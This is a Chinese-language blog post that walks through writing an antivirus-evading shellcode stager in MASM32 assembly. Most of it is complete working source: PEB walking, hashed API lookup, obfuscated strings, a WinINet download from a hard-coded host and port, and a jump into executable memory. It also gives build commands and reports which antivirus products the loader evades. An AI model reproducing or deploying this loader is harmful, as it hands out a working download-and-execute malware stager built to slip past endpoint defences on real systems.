编译汇编代码实现免杀

字数统计: 4.1k字   |   阅读时长≈ 19分

在前面的文章中读过CobaltStrike的汇编代码,整体的思路就是用某种函数将shellcode加载到内存,然后跳到写入shellcode内存的地方执行

0x01 前言

在前面的文章中读过CobaltStrike的汇编代码,整体的思路就是用某种函数将shellcode加载到内存,然后跳到写入shellcode内存的地方执行

如果只是调用函数,不可避免的会让函数在导入表中

用GetProcAddress在没有加密的情况下函数名会出现在.data段中

某天逛倾旋大佬博客的时候,发现大佬直接写汇编代码用nasm编译成obj文件,再使用link生成exe

那shellcode本就是汇编语言,稍加修改不就可以直接编译成exe了吗

这样避免了导入表会存在函数,也不会出现在C中用VirtualAlloc开一块空间,然后shellcode又开一块空间的情况,直接使用汇编加载完整shellcode就可以了

本次文章就来简单实现一下

0x02 编译器&&基础知识

这次的编译器选择的是masm32

https://www.masm32.com/

大佬文章中用的是nasm,实际测试的时候nasm对低版本windows的兼容性有点差,到winxp就执行不了了

当然也有可能是链接器有问题,网上实在找不到老版本的链接器..

下面是masm的格式

.386;声明需要使用386的CPU指令,当然还有486,586这里就不展开了
.MODEL flat ;代码段和数据段同用4GB的内存空间
.STACK  ;定义栈段,windows中栈是操作系统划分的,一般不定义
.DATA   ;数据段
.CODE   ;代码段

有了这些就可以开始写代码了

先整理一下思路,准备写个简单点的

  1. 在数据段存放混淆过的函数名和参数,再开出一些空间用来存放后面得到的函数指针
  2. 通过PEB找到kernel32.dll的地址然后找到GetProcAddress地址
  3. 写一个解密用的函数,不需要太复杂,但是最好不要用xor,这个指令还是有点敏感
  4. 把函数名解密,用GetProcAddress找到函数的地址存放到在数据段开的空间
  5. 得到全部需要用到的函数指针,最后就正常的调用函数

0x03 代码编写

数据段

首先是.data段

因为是模仿CS写的,用的函数也是shellcode里面的那些

.DATA
Point0 db 4 dup(0);GetProcAddress   
Point1 db 4 dup(0);VirtualAlloc
;db是伪指令意思是指define byte,还有dw-word,dd-dword,dup是duplicate的缩写是重复的意思
;db 4 dup(0)是指重复写入四字节的0,这里的意思就是留一个四字节的空间用来存放函数指针
;当然别的数字也没关系因为这里要覆盖掉的
Point0_dll db 4 dup(0);kernel32.dll
Point1_dll db 4 dup(0);wininet.dll
;这里和上面一样用来存放dll的地址
Dll1 db 74h,6ah,6dh,6ah,6dh,66h,77h,2dh,67h,6fh,6fh,00h   ;wininet.dll
func1 db 55h,6ah,71h,77h,76h,62h,6fh,42h,6fh,6fh,6ch,60h,00h   ;VirtualAlloc
;这里是混淆后的dll名称和函数名称,在结尾要加上0,不然字符串会一直连接下去不能截取
func4_param db "aa"
func5_param db 32h,33h,2dh,37h,33h,2dh,33h,31h,31h,31h,31h,0
func6_param0 db "HTTP/100",00h
func6_param1 db "/z9q8",00h
func6_param2 db "GET",00
;这些就是一些参数了,可以选择混淆也可以明文,ip地址最好混淆一下

上面没写全,就差不多这个意思,别的函数和dll啥的都可以按照上面来

数据段

.CODE
_START: 
;固定格式不用这个会提示warning A4023: with /coff switch, leading underscore required for start address : START
;这里开始写汇编代码
call Strlen ;就是调用Strlen函数,下面是具体的实现
Strlen:
  xor ecx,ecx
  mov esi,[esp+8]
  s:lodsb
  inc ecx
  cmp AL,0
  jnz s
  dec ecx
  ret
END _START

混淆实现

之前尝试过,xor关键字很容易被识别出来,整个简单点的,所有字符的十六进制-1好了

; win.asm
.386
.MODEL flat
.STACK
.DATA
func1 db 55h,6ah,71h,77h,76h,62h,6fh,42h,6fh,6fh,6ch,60h,00h   ;VirtualAlloc
.CODE
_START:
push offset DWORD PTR func3 
;这是的offset是伪指令,意思是取func1的地址,如果直接 push func1取的是前面四个字符
Decode:
 mov ebx,[esp+4]
 ;当前esp的值是call下面的要执行的代码的地址,所以+4取到push进来的值
 ;因为要改字符都要-1所以要先得到字符串的长度,这样可以只要需要循环几次
 ;需要写一个得到字符串长度的函数
 call Strlen;调用Strlen,这时候长度在ecx寄存器,直接用loop指令
 x:mov AL, BYTE  PTR [ebx + ecx - 1]
 ;ebx是指向被混淆的字符串的指针,加上ecx这个指针就到了末尾,最后-1就到了最后一个字符,中括号就和C语言中的&是相同的,用BYTE  PTR设定了取一字节存入AL中
 inc AL ;因为设定的是混淆的字符串是-1,+1后就正确了
 mov BYTE PTR [ebx + ecx - 1], AL   ;最后把动过的字符串放回原来的位置
 loop x ;如果ecx不为0那么到x位置继续循环
 ret 4  ;前面push了
Strlen:
  xor ecx,ecx   ;首先把ecx置零
  mov esi,[esp+8]   ;因为这里又call了所以要取esp+8的位置,放到esi里面
  s:lodsb   
  ;lodsb执行一次会把esi执行的第一个字节存入al中,然后esi+1
  inc ecx   ;自加1
  cmp AL,0  ;对比AL是否为0,不为0标志位不动
  jnz s ;要是标志为不为1跳回s位置重新执行
  dec ecx   ;因为这里ecx是算上0的,所以要减1
  ret 4 ;返回,因为前面有一个push为了堆栈平衡所以要多弹出4字节
END _START

完整代码

可以先用python生成混淆后的字符串

a = "LoadLibraryA"
for i in range(0, len(a)):
print(hex((ord(a[i]))-1).replace("0x",""),end="h,")
print("00h")

; win.asm
.386
.MODEL flat
.STACK
.DATA
Point0 db 4 dup(0);GetProcAddress
Point1 db 4 dup(0);VirtualAlloc
Point2 db 4 dup(0);
Point3 db 4 dup(0);
Point4 db 4 dup(0);InternetOpenA
Point5 db 4 dup(0);InternetConnectA
Point6 db 4 dup(0);HttpOpenRequestA
Point7 db 4 dup(0);HttpSendRequestA
Point8 db 4 dup(0);InternetReadFile
Point0_dll db 4 dup(0);kernel32.dll
Point1_dll db 4 dup(0);wininet.dll
Dll1 db 76h,68h,6dh,68h,6dh,64h,73h,2dh,63h,6bh,6bh,00h   ;wininet.dll
func1 db 55h,68h,71h,73h,74h,60h,6bh,40h,6bh,6bh,6eh,62h,00h   ;VirtualAlloc
func3 db 4bh,6eh,60h,63h,4bh,68h,61h,71h,60h,71h,78h,40h,00h ;LoadLibraryA
func4 db 48h,6dh,73h,64h,71h,6dh,64h,73h,4eh,6fh,64h,6dh,40h,00h  ;InternetOpenA
func5 db 48h,6dh,73h,64h,71h,6dh,64h,73h,42h,6eh,6dh,6dh,64h,62h,73h,40h,00h ;InternetConnectA
func6 db 47h,73h,73h,6fh,4eh,6fh,64h,6dh,51h,64h,70h,74h,64h,72h,73h,40h,00h ;HttpOpenRequestA
func7 db 47h,73h,73h,6fh,52h,64h,6dh,63h,51h,64h,70h,74h,64h,72h,73h,40h,00h ;HttpSendRequestA
func8 db 48h,6dh,73h,64h,71h,6dh,64h,73h,51h,64h,60h,63h,45h,68h,6bh,64h,00h ;InternetReadFile
func4_param db "aa"
func5_param db 30h,2fh,2dh,30h,32h,2fh,2dh,33h,2dh,31h,2fh,33h,00h
func6_param0 db "HTTP/100",00h
func6_param1 db "/5quA",00h
func6_param2 db "GET",00
;上面都是一些函数名,dll名,参数啥的,存在数据段
.CODE
ASSUME FS:NOTHING   ;指定FS,不然用FS+0x30找PEB会找不到
_START:
call Getkernel32DLL ;找kerner32.dll的地址
mov DWORD PTR [Point0_dll], ebx ;上一个函数结束后kernel32的地址在
call Get_Function   ;找到GetProcAddress的地址
mov DWORD PTR [Point0],edx  ;地址存入Point0
push offset DWORD PTR func3 ;压入混淆后的字符串
call Decode ;解码,正确的字符串会覆盖在原先的位置
push offset DWORD PTR Dll1
call Decode
mov eax,DWORD PTR [Point0_dll]  ;kernel32的地址存入eax
push offset DWORD PTR func3 ;压入函数名
push eax;压入地址
call DWORD PTR [Point0] ;调用GetProcAddress函数
push offset DWORD PTR Dll1  ;上面得到的是LoadLibraryA的地址,这时候eax是指向LoadLibraryA的函数指针,这里push wininet的字符串,下面直接call eax就可以加载wininet.dll
call eax;call LoadLibraryA  
mov DWORD PTR [Point1_dll], eax ;wininet地址存入Point1_dll中
push offset DWORD PTR func4 
call Decode
mov eax, DWORD PTR [Point1_dll]
push offset DWORD PTR func4
push eax
call DWORD PTR [Point0]
mov DWORD PTR [Point4], eax
push offset DWORD PTR func5
call Decode
mov eax, DWORD PTR [Point1_dll]
push offset DWORD PTR func5
push eax
call DWORD PTR [Point0]
mov DWORD PTR [Point5], eax
push offset DWORD PTR func6
call Decode
mov eax, DWORD PTR [Point1_dll]
push offset DWORD PTR func6
push eax
call DWORD PTR [Point0]
mov DWORD PTR [Point6], eax
push offset DWORD PTR func7
call Decode
mov eax, DWORD PTR [Point1_dll]
push offset DWORD PTR func7
push eax
call DWORD PTR [Point0]
mov DWORD PTR [Point7], eax
push offset DWORD PTR func1
call Decode
mov eax, DWORD PTR [Point0_dll]
push offset DWORD PTR func1
push eax
call DWORD PTR [Point0]
mov DWORD PTR [Point1], eax
push offset DWORD PTR func8
call Decode
mov eax, DWORD PTR [Point1_dll]
push offset DWORD PTR func8
push eax
call DWORD PTR [Point0]
mov DWORD PTR [Point8], eax
;上面都是类似的操作,把字符串压入然后解密,得到的函数指针存入数据段中
push offset DWORD PTR func5_param   ;ip地址解密
call Decode
push 0
push 0
push 0
push 1
push offset DWORD PTR func4_param
call DWORD PTR [Point4] ;调用InternetOpenA
push 0
push 0
push 3
push 0
push 0
push 52h;这里是端口
push offset DWORD PTR func5_param
push eax
call DWORD PTR [Point5] ;InternetConnectA
push 0
push 4000000h
push 0
push 0
push offset DWORD PTR func6_param0
push offset DWORD PTR func6_param1
push offset DWORD PTR func6_param2
push eax
call DWORD PTR [Point6] ;HttpOpenRequestA
mov DWORD PTR [Point2],eax  ;将得到的句柄存入Point2中
push 0
push 0
push 0
push 0
push eax
call DWORD PTR [Point7] ;HttpSendRequestA
push 40h
push 1000h
push 400000h
push 0
call DWORD PTR [Point1] ;VirtualAlloc
push offset DWORD PTR Point3
push 400000h
push eax
mov edi,eax ;VirtualAlloc的地址存入edi
mov eax,DWORD PTR [Point2]
push eax
call DWORD PTR [Point8] ;InternetReadFile
push edi;edi入栈,这时候存的是VirtualAlloc开辟的地址
ret ;跳到VirtualAlloc开辟的地址执行
Getkernel32DLL:
  xor ecx,ecx
  mov eax,fs:[ecx+30h]
  mov eax, [eax+0Ch]
  mov esi, [eax+14h]
  lodsd
  xchg eax, esi
  lodsd
  mov ebx,[eax+10h]
  ret
Get_Function:
  mov edx,[ebx+3ch]
  add edx,ebx
  mov edx, [edx+78h]
  add edx, ebx
  mov esi, [edx+20h]
  add esi, ebx
  xor ecx,ecx
  getfunc:inc ecx
  lodsd
  add eax,ebx
  cmp DWORD PTR [eax], 50746547h
  jnz getfunc
  cmp DWORD PTR [eax+4], 41636f72h
  jnz getfunc
  mov esi, [edx+24h]
  add esi, ebx
  mov cx, [esi + ecx * 2]
  dec ecx
  mov esi, [edx+1ch]
  add esi, ebx
  mov edx, [esi + ecx * 4]
  add edx, ebx
  ret 
Decode:
  mov ebx,[esp+4]
  call Strlen
  x:mov AL, BYTE  PTR [ebx + ecx - 1]
  inc AL
  mov BYTE PTR [ebx + ecx - 1], AL
  loop x
  ret 4
Strlen:
  xor ecx,ecx
  mov esi,[esp+8]
  s:lodsb
  inc ecx
  cmp AL,0
  jnz s
  dec ecx
  ret
END _START

然后用下面的指令编译,ml和link都在masm32/bin目录下

ml /c /coff /Cp masm.asm#编译为obj文件
link /subsystem:windows masm.obj#生成exe文件

实测此方法是可以过火绒和wdf的

360在刚编译好的时候是查不出来的,但是在机器上放一下就会杀掉了,应该是有模拟运行这样的东西,毕竟静态混淆过了,动态执行后在内存中该复原的还是要复原

用了myccl找了一下特征码,数据段提示的是那几个被混淆过的字符串

代码段是搜索GetProcAddress函数的位置

cmp DWORD PTR [eax], 50746547h
jnz getfunc
cmp DWORD PTR [eax+4], 41636f72h

看来要学习一下CS的shellcode的写法了

0x04 重新编写

  1. 存入一个特征码
  2. 得到导入表中的函数数量,存入ecx中
  3. 遍历函数名称,字符右移13位,遍历完函数名后对比特征码,如果不同ecx-1,如果相同话就拿ecx去找函数实际地址

本来还需要得到dll名称的长度再加上后面混淆后的字符,对比特征码的,偷懒不写了

这是cs取函数的方法,尽可能的避免了字符串的出现

和上面一样,要先写出混淆的代码,这里用汇编语言来实现

;confusion.asm
.386
.MODEL flat,stdcall ;调用约定为stdcall
includelib kernel32.lib 
includelib msvcrt.lib   ;包含msvcrt.lib,这样才可以调用里面的函数
strcmp PROTO C, :DWORD,:DWORD
printf PROTO C, :VARARG ;定义参数类型
LoadLibraryA PROTO :DWORD   ;加载dll用到
.STACK
.DATA
func db "LoadLibraryA",00h  ;LoadLibraryA   要找的函数的函数名
dll db "wininet.dll";指定要找的函数的动态链接库  
Point0 db 4 dup(0)  ;kernel32地址
func_name db 4 dup(0)   ;遍历的函数名
tz db 4 dup(0),00h  ;混淆后的内容
hex db "%x",00h ;打印的结果以十六进制显示
.CODE
ASSUME FS:NOTHING
_START:
push offset dword ptr dll
call LoadLibraryA   ;加载dll将dll地址存入Point0
mov DWORD PTR [Point0], eax
mov ebx, eax;dll地址存入ebx
mov edx,dword ptr ds:[ebx+3ch]
add edx, ebx
mov edx,dword ptr ds:[edx+78h]
add edx, ebx
mov ecx,dword ptr ds:[edx+18h]  ;NumberOfNames得到函数数量
mov edx,dword ptr ds:[edx+20h]  ;AddressOfNames函数名称的偏移
add edx, ebx;AddressOfNames地址
a:dec ecx   ;ecx-1
mov esi,dword ptr ds:[edx+ecx*4];得到函数名称偏移
add esi,ebx ;得到函数名称地址
mov dword ptr [func_name],esi   ;得到的函数名称存入func_name
xor edi,edi ;xor置零
x:xor eax,eax   ;eax置零
lodsb   
rol edi, 2
add edi,eax ;上面就是简单的混淆
cmp al,0;如果对比到0说明函数名遍历结束
jnz x   
mov dword ptr [tz], edi ;得到的特征存入tz
pushad  ;全部寄存器全部入栈,因为strcmp执行后会修改几个寄存器的值,为了保证寄存器的值一样,先入栈保存
push offset dword ptr func  ;要找的函数名
push DWORD PTR func_name;遍历到的函数名
call strcmp ;执行strcmp
pop ebx ;因为strcmp不会内平栈所以pop弹出参数
pop ebx ;同上
cmp eax,0   ;对比是否相同
popad   ;复原寄存器
jnz a
push dword ptr tz   ;相同就走到这里特征入栈
push offset dword ptr hex   ;以十六进制显示
call printf ;调用函数
END _START
;ml /c /coff /Cp confusion.asm
;link /subsystem:console /libpath:c:\masm32\lib confusion.obj   这里用console打印的结果会在控制台显示,windows的话不显示控制台,然后要设定lib的路径

0x6fceae14——LoadLibraryA
0xb7a84d25——InternetOpenA
0xea07de71——InternetConnectA
0x737cae72——HttpOpenRequestA
0x7524ae72——HttpSendRequestA
0x79c5937c——VirtualAlloc
0xea134901——InternetReadFile

; win.asm
.386
.MODEL flat
.STACK
.DATA
Point1 db 4 dup(0);VirtualAlloc
Point2 db 4 dup(0);
Point3 db 4 dup(0);
Point4 db 4 dup(0);InternetOpenA
Point5 db 4 dup(0);InternetConnectA
Point6 db 4 dup(0);HttpOpenRequestA
Point7 db 4 dup(0);HttpSendRequestA
Point8 db 4 dup(0);InternetReadFile
Point0_dll db 4 dup(0);kernel32.dll
Point1_dll db 4 dup(0);wininet.dll
IED_struct db 4 dup(0);IMAGE_EXPORT_DIRECTORY结构指针
func1 db 7ch,93h,0c5h,79h;VirtualAlloc
func3 db 14h,0aeh,0ceh,6fh   ;LoadLibraryA
func4 db 25h,4dh,0a8h,0b7h  ;InternetOpenA
func5 db 71h,0deh,07h,0eah   ;InternetConnectA
func6 db 72h,0aeh,7ch,73h   ;HttpOpenRequestA
func7 db 72h,0aeh, 24h,75h  ;HttpSendRequestA
func8 db 01h,49h,13h,0eah  ;InternetReadFile
func4_param db "aa"
func5_param db "10.130.4.205",00h
func6_param0 db "HTTP/100",00h
func6_param1 db "/5quA",00h
func6_param2 db "GET",00
.CODE
ASSUME FS:NOTHING
_START:
call Getkernel32DLL
mov DWORD PTR [Point0_dll], ebx
push dword ptr func3
push dword ptr Point0_dll
call Decode
push 0074656eh
push 696e6977h
push esp
call eax
mov dword ptr [Point1_dll], eax
push dword ptr func4
push eax
call Decode
mov dword ptr Point4,eax
push dword ptr func5
push dword ptr Point1_dll
call Decode
mov dword ptr Point5,eax
push dword ptr func6
push dword ptr Point1_dll
call Decode
mov dword ptr Point6,eax
push dword ptr func7
push dword ptr Point1_dll
call Decode
mov dword ptr Point7,eax
push dword ptr func8
push dword ptr Point1_dll
call Decode
mov dword ptr Point8,eax
push dword ptr func1
push dword ptr Point0_dll
call Decode
mov dword ptr Point1,eax
push 0
push 0
push 0
push 1
push offset DWORD PTR func4_param
call DWORD PTR [Point4]
push 0
push 0
push 3
push 0
push 0
push 52h
push offset DWORD PTR func5_param
push eax
call DWORD PTR [Point5]
push 0
push 4000000h
push 0
push 0
push offset DWORD PTR func6_param0
push offset DWORD PTR func6_param1
push offset DWORD PTR func6_param2
push eax
call DWORD PTR [Point6]
mov DWORD PTR [Point2],eax
push 0
push 0
push 0
push 0
push eax
call DWORD PTR [Point7]
push 40h
push 1000h
push 400000h
push 0
call DWORD PTR [Point1]
push offset DWORD PTR Point3
push 400000h
push eax
mov edi,eax
mov eax,DWORD PTR [Point2]
push eax
call DWORD PTR [Point8]
jmp s
s:jmp edi
int 3
Getkernel32DLL:
  xor ecx,ecx
  mov eax,fs:[ecx+30h]
  mov eax, [eax+0Ch]
  mov esi, [eax+14h]
  lodsd
  xchg eax, esi
  lodsd
  mov ebx,[eax+10h]
  ret
Decode:
  mov ebx,[esp+4]
  mov eax,[esp+8]
  mov edx,dword ptr ds:[ebx+3ch]
  add edx, ebx
  mov edx,dword ptr ds:[edx+78h]
  add edx, ebx
  mov dword ptr [IED_struct], edx
  mov ecx,dword ptr ds:[edx+18h]
  mov edx,dword ptr ds:[edx+20h]
  add edx, ebx
  a:dec ecx
  mov esi,dword ptr ds:[edx+ecx*4]
  add esi,ebx
  xor edi,edi
  x:xor eax,eax
  lodsb
  rol edi, 2
  add edi,eax
  cmp al,0
  jnz x
  cmp dword ptr [esp+8h],edi
  jnz a
  mov edx,dword ptr [IED_struct]
  mov eax,dword ptr ds:[edx+24h]
  add eax,ebx
  mov cx,word ptr ds:[eax+ecx*2]
  mov edx, dword ptr ds:[edx+1ch]
  add edx,ebx
  mov eax,dword ptr ds:[edx+ecx*4]
  add eax,ebx
  ret 8
END _START

这方法可以过常见的杀软,但是丢到vir上面查杀的还是挺多的

可以用到花指令,各种同义指令,少用call,jmp,push这类的,可以当一种思路


谢谢你请我吃糖果

支付宝
微信

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

俗话说“好记性不如烂笔头”,各个安全社区各自为战,当我们想要搜索某一方面的文章的时候总是得在各个平台之间来回横跳,于是乎,一个平台文章聚合搜索的想法诞生了。
然后正好我想有一个自己的博客,于是乎两者融合在了一起。
下面简单介绍各个导航的区别:
个人文章:本人的笔记、复现、总结等或者本人参与的共同创作。
收集文章:手工从公众号收集保存的文章,更新频率看本人喜好所以比较慢。
聚合文章:从各大平台收集整理,由工具实现,每天更新。
很惭愧,只做了一点微小的工作。